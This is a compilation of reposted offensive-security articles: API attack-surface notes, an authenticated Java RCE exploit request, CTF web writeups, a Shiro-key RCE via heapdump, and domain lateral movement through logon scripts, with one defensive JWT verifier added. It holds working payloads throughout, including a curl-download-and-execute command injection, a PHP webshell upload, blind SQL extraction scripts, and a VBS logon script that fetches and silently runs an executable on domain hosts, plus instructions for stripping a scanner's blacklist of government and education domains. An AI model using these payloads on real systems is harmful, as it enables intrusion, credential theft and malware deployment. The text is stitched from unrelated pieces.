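        print(name, audit_redis_conf(text) or "no findings")
```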
-
Title: API Security Learning Notes
Necessity

Front-end/back-end separation has become a major trend on the web. It can be effectively decoupled through Tomcat+Nginx (there can also be a Node.js layer in the middle). In addition, front/back-end separation lays a solid foundation for future large-scale distributed architectures, elastic computing architectures, microservice architectures, and multi-terminal services (multiple clients such as browsers, in-vehicle terminals, Android, iOS, etc.). The API carries the responsibility of front-end/back-end communication, so it is necessary to learn API security. The idea of this article is to summarize some common attack surfaces in APIs. The author is still learning this area; if there are any mistakes, I hope you can correct them.

Common API technologies

GraphQL

GraphQL is a query language for APIs. It usually has the following characteristics:
(1) The request is sent to the /graphql endpoint
(2) It contains many newline characters (\n)

A typical introspection request body is {"query": "...", "variables": null}; with the \r\n newlines expanded, the query is:

    query IntrospectionQuery {
      __schema {
        queryType { name }
        mutationType { name }
        subscriptionType { name }
        types { ...FullType }
        directives { name description locations args { ...InputValue } }
      }
    }
    fragment FullType on __Type {
      kind name description
      fields(includeDeprecated: true) {
        name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason
      }
      inputFields { ...InputValue }
      interfaces { ...TypeRef }
      enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason }
      possibleTypes { ...TypeRef }
    }
    fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue }
    fragment TypeRef on __Type {
      kind name
      ofType { kind name ofType { kind name ofType { kind name ofType { kind name
        ofType { kind name ofType { kind name ofType { kind name } } } } } } }
    }

SOAP-WSDL

WSDL (Web Services Description Language) is an XML application. It describes a web service as a set of service access points through which clients can access services containing document-oriented information or procedure calls. It uses the SOAP protocol, which generally sends data in XML format, and there will be WSDL files. The common .asmx files in .NET also have a wsdl form: xxx.asmx?wsdl. We can use soapui to test this type of API.

WADL

There is a very obvious wadl marker in the file. You can also use the REST function of soapui for testing.

REST

REST APIs are not as obvious as the previous ones, and REST is also the most commonly used API technology today. REST is a set of architectural constraints, not a protocol or standard; API developers can implement REST in various ways. When a client makes a request through a RESTful API, it passes a representation of the resource's state to the requester or endpoint. This representation is transmitted over HTTP in one of the following formats: JSON (JavaScript Object Notation), HTML, XLT, Python, PHP, or plain text. JSON is the most commonly used; although its name means "JavaScript Object Notation", it is suitable for all languages and can be read by both humans and machines. There are some things to note: headers and parameters are also important in the HTTP methods of RESTful API requests, because they contain important identifying information such as request metadata, authorization, the uniform resource identifier (URI), caching, and cookies. There are request headers and response headers, each with its own HTTP connection information and status codes.
How to get endpoints

In security tests of APIs we usually focus on permission issues, the security of the API endpoints themselves, and the infrastructure. To test the endpoints you must first collect as many API endpoints as possible.

swagger api-docs leak

Swagger is a standardized and complete framework for generating, describing, calling, and visualizing RESTful-style web services. Common fingerprints:
# swagger 2
/swagger-ui.html
/api-docs
/v2/api-docs
# swagger 3
/swagger-ui/index.html
/api-docs
/v2/api-docs
/v3/api-docs
api-docs can reveal all endpoint information. Here are two tools for testing. The first is swagger-editor (https://github.com/swagger-api/swagger-editor): after downloading, open index.html to use it; you can import a file or load a URL remotely, and it supports api-docs in JSON and YAML formats. The second is APIKit (https://github.com/API-Security/APIKit), a Burp plugin.

graphql introspection query

Get all endpoint information: https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ
Send the IntrospectionQuery shown in the GraphQL section above to the /graphql interface. We can use the result to generate interface documents with https://github.com/2fd/graphdoc (needs Node.js); test.json is the JSON data returned by the introspection query:
npm install -g @2fd/graphdoc
graphdoc -s ./test.json -o ./doc/schema
Then open the generated /doc/index.html and construct data packets according to its format.

Other

In black box testing, a big problem is that the API endpoints are not fully found. We need to look for them in the corresponding application or elsewhere:
(1) web: static resources such as JS and HTML can contain API endpoints; the Burp plugin JS LinkFinder can collect them passively
(2) App and other client applications
(3) GitHub
(4) Fuzzing according to the naming rules

Authorization Method

Basic Auth

The username and password of the user are provided every time the API is requested. Usually there is an Authorization header in the HTTP packet:
Authorization: Basic base64(username:password)
This is relatively weak and is rarely used now.

JWT

JWT (JSON Web Token) is a token-based authentication and authorization mechanism, divided into three parts:
Header: describes the metadata of the JWT, defining the algorithm used to generate the signature and the type of token.
Payload: used to store the data that needs to be passed.
Signature: the server uses the signature algorithm specified in the header (HMAC SHA256 by default) to prevent the JWT from being tampered with. The calculation method is: signature = HMACSHA256(base64(header) + '.'
+ base64(payload), secret)
Online test: https://jwt.io/
Ordinary tokens require the backend to store the mapping between token and user, while a JWT carries that mapping itself.

Other

Custom headers, cookies, and other forms of tokens such as an apikey or a randomly generated value.

Common security issues and testing methods

API Gateway

An API gateway is a service built between the client and the microservices. Non-business logic such as permission verification, monitoring, caching and request routing can be handled in the API gateway. The API gateway is like the facade of the entire microservice system and is its only entrance: the client sends the request to the API gateway first, and the gateway then forwards the request to a microservice instance based on the request's identification information.

apisix

Apache APISIX is a cloud-native API gateway under the Apache Software Foundation. It combines dynamic, real-time and high-performance features, providing rich traffic management functions such as load balancing, dynamic upstreams, grayscale (canary) release, service circuit breaking, identity authentication, observability, etc. We can use Apache APISIX to handle traditional north-south traffic, or east-west traffic between services. It is also supported as a K8s Ingress Controller.

APISIX previously exposed a command execution vulnerability, CVE-2022-24112 (the current latest version is 3.0).
Scope of impact: all Apache APISIX versions from 1.3 to 2.12.1 (excluding 2.12.1); all Apache APISIX 2.10.0 to 2.10.4 LTS versions (excluding 2.10.4).

Build the vulnerable environment:
git clone https://github.com/twseptian/cve-2022-24112  ## Get the dockerfile
cd cve-2022-24112/apisix-docker/example/  ## Enter the corresponding directory
docker-compose -p docker-apisix up -d  ## Start all apisix services

Exploitation conditions (docker-based environment): the batch-requests plugin is enabled by default. The user runs the Apache APISIX default configuration (Admin API enabled, default Admin Key, no separate management port assigned), so attackers can call the Admin API through the batch-requests plugin.

Attack ideas:
1. Use the batch-requests plugin vulnerability to bypass request header detection;
2. Register routes with the Admin API by forging the request header;
3. When registering a route, pass Lua code in the filter_func parameter, causing remote code execution.
exp: https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py
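The JWT signature scheme described in the Authorization Method section above (HMAC-SHA256 over base64(header) + '.' + base64(payload)) is only a protection if the verifier pins the algorithm and compares the signature properly. The following added example (not code from the original article) builds an HS256 token exactly as described and then verifies it, rejecting a token whose payload was edited and a token whose header claims alg none; the secret and all token contents are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo secret; a real deployment loads this from a secret store.
DEMO_SECRET = b"demo-shared-secret-not-for-production"


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment; JWTs strip '=' padding, so restore it first."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build a JWT as the article describes:
    HMAC-SHA256(base64(header) + '.' + base64(payload), secret)."""
    signing_input = (
        _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload if the token carries a valid HS256 signature, else None.

    The algorithm is pinned server-side: a header that claims 'none' or any
    other algorithm is rejected outright, so the header cannot talk the
    verifier out of checking the signature. The comparison is constant-time.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        expected_sig = _b64url_decode(sig_b64)
    except ValueError:  # bad base64, bad UTF-8 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode()
    actual_sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(actual_sig, expected_sig):
        return None
    try:
        return json.loads(_b64url_decode(payload_b64))
    except ValueError:
        return None


def demo() -> dict:
    """Exercise the verifier on a valid token and two tampered variants."""
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {"sub": "1001", "role": "user"}
    good = sign_hs256(header, payload, DEMO_SECRET)

    # Payload edited (role elevated) without re-signing: signature no longer matches.
    h, _, s = good.split(".")
    forged_payload = _b64url_encode(b'{"sub":"1001","role":"admin"}')
    tampered = f"{h}.{forged_payload}.{s}"

    # Header rewritten to alg none with an empty signature segment.
    none_header = _b64url_encode(b'{"alg":"none","typ":"JWT"}')
    unsigned = f"{none_header}.{forged_payload}."

    return {
        "valid": verify_hs256(good, DEMO_SECRET),
        "tampered": verify_hs256(tampered, DEMO_SECRET),
        "alg_none": verify_hs256(unsigned, DEMO_SECRET),
    }


if __name__ == "__main__":
    print(demo())
```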
-
Title: A micro-1day backend RCE audit vulnerability
A certain application has a background RCE. According to relevant information, we found a call to newInstance instantiation in the background audit process. Tracing the source leads to InterfaceRegisterCustomOperationCmd#execute. The access path is /api/integration/workflowflow/getInterfaceRegisterCustomOperation. getInterfaceRegisterCustomOperation calls execute, which first checks the user, so this is a background (authenticated) vulnerability.

Because we need the taint sink JavaCodeToObject, we must satisfy the if conditions and control var18 and var20. Here var14 needs to be set: the value of var14 is obtained from the request parameter method, and because the POST method is specified earlier, method=add. After entering the if branch, the function returns if var15 is empty, so actionid must not be empty. Combined with the above: method=add&actionid=1.

If var18 does not begin with weaver.interfaces.workflow.action.javacode.Action, the following check throws an exception, which does not give the desired result. So classname=weaver.interfaces.workflow.action.javacode.Action; combined with the parameters above: method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action.

The var20 value is taken from the javacode parameter, giving: method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action&javacode=.

If var18 contains weaver.interfaces.workflow.action.javacode it enters the JavaCodeToObject call we want, so classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Action is used for the concatenation; otherwise a class-loading exception is reported. With the above, the var18 and var20 conditions are satisfied.

The constructed var20 parameter is javacode= followed by:

package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode;
import java.io.IOException;
public class test {
    static {
        try {
            Runtime.getRuntime().exec('calc.exe');
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Here the command is placed in a static block because the code in a static block runs automatically when the class is instantiated, which achieves command execution. The package did not seem to be used successfully at first; looking back at the code, I found that a parameter was missing: dtinfo_CustomParameterData.

POST /api/integration/workflowflow/getInterfaceRegisterCustomOperation HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ecology_JSessionid=aaa8G6PRBnnBD82yi6Fky; JSESSIONID=aaa8G6PRBnnBD82yi6Fky; __randcode__=d2fa15e2-395e-4b3b-a004-82fc07c18695; loginidweaver=1; languageidweaver=7; loginuuids=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 548

method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Test&dtinfo_CustomParameterData=11&javaCode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode; import java.io.IOException; public class Test { static { try { Runtime.getRuntime().exec('calc.exe'); } catch (IOException e) { e.printStackTrace(); } } }

Reprinted from: https://xz.aliyun.com/t/11947
-
Title: ARL Enhanced Renovation of Asset Scan Artifact
Pull the project

First clone it from GitHub to the server:
git clone https://github.com/ki9mu/ARL-plus-docker/

Modify the configuration file

Because ARL has a blacklist in its configuration file, projects such as GOV or EDU domains sometimes cannot be scanned, so modifying the configuration file here lifts the restriction.
cd ARL-plus-docker/
vi config-docker.yaml
Just delete a few items from the blacklist here. After modification, add and modify the RiskIQ and FOFA APIs.

The OneForAll module is added in the enhanced version, so it needs to be enabled in its configuration file: the default in the cloned code is False, and you can change the switches you want to turn on to True.
vi oneforall-config/setting.py

After modifying the configuration file, start Docker. First add a volume, then docker-compose up -d can start it directly. If pulling the image is very slow, you can change the Docker registry mirror.
docker volume create --name=arl_db
docker-compose up -d
When you see a row of "done", it has succeeded.

At this point you need to enter the container to modify the Python code, because there is also a blacklist in the Python script. First use docker ps to find the container ID, then enter the container and edit with vi:
docker ps  # View container ID
docker exec -it <container ID> bash
vi app/config.py

Add fingerprints

After successful installation, add fingerprints to give your lighthouse a stronger fingerprint library.
Address: https://vps:5003/
Default account and password: admin / arlpass
git clone https://github.com/loecho-sec/ARL-Finger-ADD
cd ARL-Finger-ADD
python ARL-Finger-ADD.py -O https://vps:5003/ admin arlpass

Installed successfully. Log in with the default password, then change the default password in the upper right corner and use it happily.
-
Title: NCTF2022 Web Writeup
1.calc

Question address: http://116.205.139.166:8001/
Right click /source for the source code:

@app.route('/calc',methods=['GET'])
def calc():
    ip=request.remote_addr
    num=request.values.get('num')
    log='echo {0}{1}{2} >> ./tmp/log.txt'.format(time.strftime('%Y%m%d-%H%M%S',time.localtime()),ip,num)
    if waf(num):
        try:
            data=eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return 'waf!'

A Flask error can be triggered to see the filtering rules of the waf: http://162.14.110.241:8050/calc?num[]=

def waf(s):
    blacklist=['import','(',')','#','@','^','$',',',''?','`',' ','_','|';','','','{','}','','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag=True
    for no in blacklist:
        if no.lower() in s.lower():
            flag=False
            print(no)
            break
    return flag

After trying, I found that num can be used to run commands: %0a separates different commands, and %09 replaces spaces. Note that the statement must first be executed normally by eval(num), otherwise execution never reaches os.system(log). The solution is to wrap the command in single quotes:
/calc?num=%0a'curl'%09'gtwq54.dnslog.cn'%0a
Because backticks do not bring out the output easily, I simply use curl to download a payload and go online with msf:
/calc?num=%0a'curl'%09'http://x.x.x.x:yyyy/testapp'%09'-o'%09'/tmp/testapp'%0a
/calc?num=%0a'chmod'%09'777'%09'/tmp/testapp'%0a
/calc?num=%0a'/tmp/testapp'%0a

2.ez_php

Question address: http://81.70.155.160/
AyaCMS GitHub address: https://github.com/loadream/AyaCMS
There are many vulnerabilities in the issues, but you have to log in to the backend or front desk. The backend admin.php was tried with weak passwords but failed, and the front desk could not register. So I downloaded the source code directly for code auditing, and then read it for most of the day.

Many places in the source code have defined('IN_AYA') or exit('Access Denied'); that is, they cannot be accessed directly and must be included or required through other PHP files that have defined the IN_AYA constant. This way of thinking is converted to finding a file inclusion vulnerability. After searching for a long time I found a place at /aya/admin.inc.php: get_cookie gets the cookie value with the aya_ prefix, and decrypt's source can be found together with the corresponding encrypt function. AYA_KEY during encryption is the default value aaa. After the file is included, the idea becomes much broader, and then combine it with the known vulnerability https://github.com/loadream/AyaCMS/issues/3.

payload:

<?php
function random($length=4,$chars='abcdefghijklmnopqrstuvwxyz'){
    $hash='';
    $max=strlen($chars)-1;
    for($i=0;$i<$length;$i++){
        $hash.=$chars[mt_rand(0,$max)];
    }
    return $hash;
}
function kecrypt($txt,$key){
    $key=md5($key);
    $len=strlen($txt);
    $ctr=0;
    $str='';
    for($i=0;$i<$len;$i++){
        $ctr=$ctr==32?0:$ctr;
        $str.=$txt[$i]^$key[$ctr++];
    }
    return $str;
}
function encrypt($txt,$key=''){
    $key or $key='aaa';
    $rnd=random(32);
    $len=strlen($txt);
    $ctr=0;
    $str='';
    for($i=0;$i<$len;$i++){
        $ctr=$ctr==32?0:$ctr;
        $str.=$rnd[$ctr].($txt[$i]^$rnd[$ctr++]);
    }
    return str_replace('=','',base64_encode(kecrypt($str,$key)));
}
echo encrypt('./module/admin/fst_upload');

HTTP packet:

POST /aya/admin.inc.php HTTP/1.1
Host: 81.70.155.160
Content-Length: 244
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=---WebKitFormBoundarykhsd4wQ8UBmzCnD1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: aya_admin_lang=QWwPIAJ9EitZZEEoQWtYOFA0DCUAMFttV2ANPBUlRmFNKBRmFTEQG1ZxTDFaaVEyQyMWdA
Connection: close

-----WebKitFormBoundarykhsd4wQ8UBmzCnD1
Content-Disposition: form-data; name='upfile'; filename='xzxz123123123.php'
Content-Type: application/octet-stream

<?php eval($_REQUEST[1]);phpinfo();
-----WebKitFormBoundarykhsd4wQ8UBmzCnD1

3.ezbypass

Hint: the waf is ModSecurity.
Question address: http://162.14.110.241:8099/sql.php and http://121.37.11.207:8099/sql.php
I found a reference article online: https://blog.h3xstream.com/2021/10/bypassing-modsecurity-waf.html
The rest is to use a script that directly follows its payload. Because the question prompts "Can you find my password?", just guess the content of the password column.

import requests
import time
flag=''
i=1
while True:
    min=32
    max=127
    while min < max:
        time.sleep(0.08)
        mid=(min + max) //2
        print(chr(mid))
        payload='if(ascii 1.e(substring(1.e(select password from users.info),{},1))>{},1,0)'.format(i, mid)
        url='http://162.14.110.241:8099/sql.php?id={}'.format(payload)
        res=requests.get(url)
        if 'letian' in res.text:
            min=mid + 1
        else:
            max=mid
    flag +=chr(min)
    i +=1
    print('found', flag)

4.ez_sql

Question address: http://81.70.155.160:3000/
Attachment: https://nctf.h4ck.fun/static/upload/files/06b43b853452e30514edf6bd709b3f99.zip
The question description gives the source code.

app.js:

import { Application, Router, helpers } from 'https://deno.land/x/oak/mod.ts';
import Flight from './db.js';
const app=new Application();
const router=new Router();
router.get('/', async(ctx)=>{
    ctx.response.body='check your flight `/flight?id=`';
});
router.get('/flight', async(ctx)=>{
    const id=helpers.getQuery(ctx, { mergeParams: true });
    const info=await Flight.select({departure: 'departure', destination: 'destination'}).where(id).all();
    ctx.response.body=info;
});
app.use(router.routes());
app.use(router.allowedMethods());
app.listen({ port: 3000, hostname: '0.0.0.0' });

db.js:

import { DataTypes, Database, Model, SQLite3Connector} from 'https://deno.land/x/[email protected]/mod.ts';
const connector=new SQLite3Connector({ filepath: '/tmp/flight.db' });
const db=new Database(connector);
class Flight extends Model {
    static table='flight';
    static fields={
        id: { primaryKey: true, autoIncrement: true },
        department: DataTypes.STRING,
        destination: DataTypes.STRING,
    };
}
class Flag extends Model {
    static table='flag';
    static fields={
        flag: DataTypes.STRING,
    };
}
db.link([Flight, Flag]);
await db.sync({ drop: true });
await Flight.create({ department: 'Paris', destination: 'Tokyo', });
await Flight.create({ department: 'Las Vegas', destination: 'Washington', });
await Flight.create({ department: 'London', destination: 'San Francisco', });
await Flag.create({ flag: Deno.env.get('flag'), });
export default Flight

This is almost exactly the same as Hack.lu 2022 foodAPI; the reference articles are:
https://blog.huli.tw/2022/10/31/hacklu-ctf-2022-writeup/
https://gist.github.com/parrot409/f7f5807478f50376057fba755865bd98
https://gist.github.com/terjanq/1926a1afb420bd98ac7b97031e377436
The only difference is that the original question passes id in RESTful form, while this question passes it as a GET parameter, so the exp cannot be copied directly. However, if you look at the principle analyzed in the article, the idea is to use the parameters to splice the SQL statement, so imitate the original payload and pass it in as another GET query:
http://81.70.155.160:3000/flight?id=1?=a` and 0 union select flag,2 from flag;

Attachment download: https://github.com/X1cT34m/NCTF2022
Reprinted from the original: https://exp10it.cn/2022/12/nctf-2022-web-writeup/#calc
-
Title: heapdump leaks Shiro key and thus RCE
1. Introduction

I built a vulnerable environment in which a Spring heapdump leaks the Shiro key and thus leads to RCE. GitHub address: https://github.com/P4r4d1se/heapdump_shiro_vuln
Exploit conditions: a heapdump file leak in a Spring + Shiro environment, and an exploitable gadget chain.

2. Vulnerability Principle

Many experts have shared the principles and debugging analysis of Shiro-related vulnerabilities, so I won't go into details here. I will mainly explain this vulnerable environment:
(1) Spring actually has its own default security framework, Spring Security, but some developers are used to Shiro and replace Spring Security with Shiro. This is not uncommon; for example, RuoYi is Spring + Shiro.
(2) When the key is known, even the latest version of Shiro is still vulnerable, and in many cases the Shiro key is leaked through development, deployment and similar issues.
(3) In Shiro versions greater than 1.2.4, the key is generated randomly without the developer's manual intervention. This random key does not change between starts and restarts of the web environment, and it can be found in the JVM memory.
(4) Spring's heapdump file is exported from the JVM memory.
Put together, this combination vulnerability is created.

3. Vulnerability Demonstration

After starting the vulnerable environment, you can see that the Shiro version is 1.8.0. Access /actuator/heapdump on port 8080 to get the heapdump file.

There are two ways I often use to get the Shiro key:

(1) JDumpSpider: https://github.com/whwlsfb/JDumpSpider
This widget automatically crawls variable information in the heapdump, which is more convenient. The disadvantage is that it may miss information that is not in its crawl list. Run java -jar JDumpSpider.jar heapdump directly to obtain the variable information automatically. Here you get the ShiroKey.

(2) jvisualvm.exe: Java's own tool, located by default at <JDK directory>/bin/jvisualvm.exe
With this tool you need to find the information manually: enter org.apache.shiro.web.mgt.CookieRememberMeManager in the filter, and the 16 circled bytes are the key. Use a Python script to convert them into a base64-encoded Shiro key (the format string packs exactly one signed byte per value):

import base64
import struct
print(base64.b64encode(struct.pack('b'*16, 109,-96,12,-115,33,59,24,112,44,124,56,110,-15,59,1,-41)))

Using the obtained key, exploitation succeeds.

Restart the server and get the Shiro key again: you can see that the key has changed, which verifies the third point of the vulnerability principle. Each time the application starts, a random key is generated. Switching to the new key, exploitation still works.

Reprinted from the original link: https://xz.aliyun.com/t/11908
-
Title: Login script issuance
0x1. Utilization scenario

After obtaining domain controller or domain admin level permissions, if you want to move laterally to a PC host in the domain and the target has its firewall enabled so that 445 and 135 cannot be used, you can obtain the target host permissions by binding a logon script.

0x2. Utilization method

Method 1: PowerShell (built in on win2012 and above)
Obtain the current domain user information:
Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8
Bind the specified user:
Set-ADUser -Identity zhangsan -ScriptPath 'download.vbs'
Unbind:
Set-ADUser -Identity zhangsan -ScriptPath ' '

Method 2: use dsmod for binding
dsmod user -loscr 'download.vbs' 'CN=john,CN=Users,DC=redteam,DC=com'
Unbind:
dsmod user -loscr '' 'CN=john,CN=Users,DC=redteam,DC=com'

Refresh group policy:
shell gpupdate /force

VBS content:

strFileURL='http://192.168.172.129:82/logo.ico'
strHDLocation='C:\Users\Public\Documents\ChsIME.exe'
Set objXMLHTTP=CreateObject('MSXML2.XMLHTTP')
objXMLHTTP.open 'GET', strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status=200 Then
Set objADOStream=CreateObject('ADODB.Stream')
objADOStream.Open
objADOStream.Type=1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position=0 'Set the stream position to the start
Set objFSO=Createobject('Scripting.FileSystemObject')
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO=Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream=Nothing
End if
Set objXMLHTTP=Nothing
strComputer='.'
set ws=wscript.createobject('wscript.shell')
val=ws.run ('C:\Users\Public\Documents\ChsIME.exe',0)

Upload it to the DC directory c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\, bind it through method one or two, and refresh the group policy.
https://www.cnblogs.com/websecyw/p/16657762.html
-
Title: Daily SRC in xss tips
0x00 Preface

Regarding public and private bug bounty tests: how to pick up XSS holes. Filler, filler, filler!

0x01 Daily Test

A boring daily test site. During a penetration test, you find an HTML tag on the page that loads an image from the server, and the src is of the type that prepends the server's own address. You can try fuzzing the Host header to detect whether there is XSS. Seeing this situation, we can roughly guess that the code behind it looks like:

<img src="<?php echo "http://{$_SERVER['HTTP_HOST']}/"?>xxx/aaa.png"/>

This seems very simple: modifying the Host header in the request packet causes XSS. The pop-up window succeeds, and the rag-picking tip is complete.

Reprinted from the original link: https://blog.csdn.net/Guapichen/article/details/124040935?spm=1001.2014.3001.5501
-
Title: Anxun Cup 2022 Web Writeup
babyphp

index.php:

<?php
//something in flag.php
class A {
    public $a;
    public $b;
    public function __wakeup() {
        $this->a='babyhacker';
    }
    public function __invoke() {
        if (isset($this->a) && $this->a==md5($this->a)) {
            $this->b->uwant();
        }
    }
}
class B {
    public $a;
    public $b;
    public $k;
    function __destruct() {
        $this->b=$this->k;
        die($this->a);
    }
}
class C {
    public $a;
    public $c;
    public function __toString() {
        $cc=$this->c;
        return $cc();
    }
    public function uwant() {
        if ($this->a=='phpinfo') {
            phpinfo();
        } else {
            call_user_func(array(reset($_SESSION), $this->a));
        }
    }
}
if (isset($_GET['d0g3'])) {
    ini_set($_GET['baby'], $_GET['d0g3']);
    session_start();
    $_SESSION['sess']=$_POST['sess'];
} else{
    session_start();
    if (isset($_POST['pop'])) {
        unserialize($_POST['pop']);
    }
}
var_dump($_SESSION);
highlight_file(__FILE__);

flag.php:

<?php
session_start();
highlight_file(__FILE__);
//flag in the root directory
if($_SERVER['REMOTE_ADDR']==='127.0.0.1'){
    $f1ag=implode(array(new $_GET['a']($_GET['b'])));
    $_SESSION['F1AG']=$f1ag;
}else{
    echo 'only localhost!';
}

By constructing a pop chain you can see that session.serialize_handler is php, and combined with the source code of flag.php it is speculated that the session deserializes a SoapClient to perform SSRF. The idea is to first control the ini_set parameter to specify serialize_handler as php_serialize, pass the SoapClient deserialization payload in the sess parameter, then remove all GET and POST parameters and access the page once to trigger deserialization. Finally, use the known pop chain to call SoapClient's __call method to trigger SSRF. The SSRF first uses PHP's native class GlobIterator to find files starting with f in the root directory, and then uses SplFileObject to read the flag.

pop chain payload:

<?php
class A {
    public $a;
    public $b;
}
class B {
}
class C {
    public $a;
    public $c;
}
$cc=new C();
$cc->a='xxxx';
$a=new A();
$a->a='0e215962017';
$a->b=$cc;
$c=new C();
$c->c=$a;
$b=new B();
$b->a=$c;
echo serialize($b);

ssrf payload:

<?php
//$a=new SoapClient(null,array('location'=>'http://127.0.0.1/flag.php?a=GlobIterator&b=/f*', 'user_agent'=>'111\r\nCookie: PHPSESSID=c9urdtg4kjp5jl36mrl44qlsah', 'uri'=>'test'));
$a=new SoapClient(null,array('location'=>'http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111lllllllaagg', 'user_agent'=>'111\r\nCookie: PHPSESSID=c9urdtg4kjp5jl36mrl44qlsah', 'uri'=>'test'));
$b=serialize($a);
echo '|'.urlencode($b);

Use GlobIterator first, then reuse with SplFileObject.

EZ_JS

At the login interface enter any account and password, and it jumps to the /cookie route. Right-click to view the comment: JSFuck decoding gives the prompt "enter capital". The comment on the home page is as follows:

<!--This secret is 7 characters long for security!
hash=md5(secret+'flag');//1946714cfa9deb70cc40bab32872f98a
admin cookie is md5(secret+urldecode('flag%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00dog'));
-->

At a glance, a hash length extension attack. Changing the cookie hash directly turned out to be useless. Later, the userid was empty and an error occurred. Combined with the previous tips, use the upper/lower case feature of JS:
'ı'.toUpperCase()=='I' //true
Then it jumps to /infoflllllag (the static environment resets every 30 minutes, so the earlier screenshot is used).

var express=require('express');
var router=express.Router();
const isObject=obj=>obj && obj.constructor && obj.constructor===Object;
const merge=(a, b)=>{
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr]=b[attr];
        }
    }
    return a
}
const clone=(a)=>{
    return merge({}, a);
}
router.get('/', function(req, res, next) {
    if(req.flag=='flag'){
        //Output flag;
        res.send('flag???');
    }
    res.render('info');
});
router.post('/', express.json(),function(req, res) {
    var str=req.body.id;
    var obj=JSON.parse(str);
    req.cookies.id=clone(obj);
    res.render('info');
});
module.exports=router;

It is obvious that the flag attribute of req should be polluted through the prototype chain. The payload is as follows:
id={'__proto__':+{'flag':+'flag'}}
Then switch to GET to access the flag (screenshot of the static target machine).

ezupload

Upload phpinfo first: PHP 8.0.1, disable_functions filters a bunch, but file_get_contents() is available, and the question's source code is read through it.

<html>
<body>
<form method='POST' enctype='multipart/form-data'>
This front end is not beautiful!
<input type='file' name='upload_file' />
<input type='submit' name='submit' value='submit' />
</form>
</body>
</html>
<?php
function waf($var): bool{
    $blacklist=['\$_', 'eval','copy' ,'assert','usort','include', 'require', '$', '^', '~', '-', '%', '*','file','fopen','fwriter','fput','copy','curl','fread','fget','function_exists','dl','putenv','system','exec','shell_exec','passthru','proc_open','proc_close', 'proc_get_status','checkdnsrr','getmxrr','getservbyname','getservbyport','syslog','popen','show_source','highlight_file','`','chmod'];
    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }
    return False;
}
error_reporting(0);
//Set Upload Directory
define('UPLOAD_PATH', './uploads');
$msg='Upload Success!';
if (isset($_POST['submit'])) {
    $temp_file=$_FILES['upload_file']['tmp_name'];
    $file_name=$_FILES['upload_file']['name'];
    $ext=pathinfo($file_name,PATHINFO_EXTENSION);
    if(!preg_match('/php/i', strtolower($ext))){
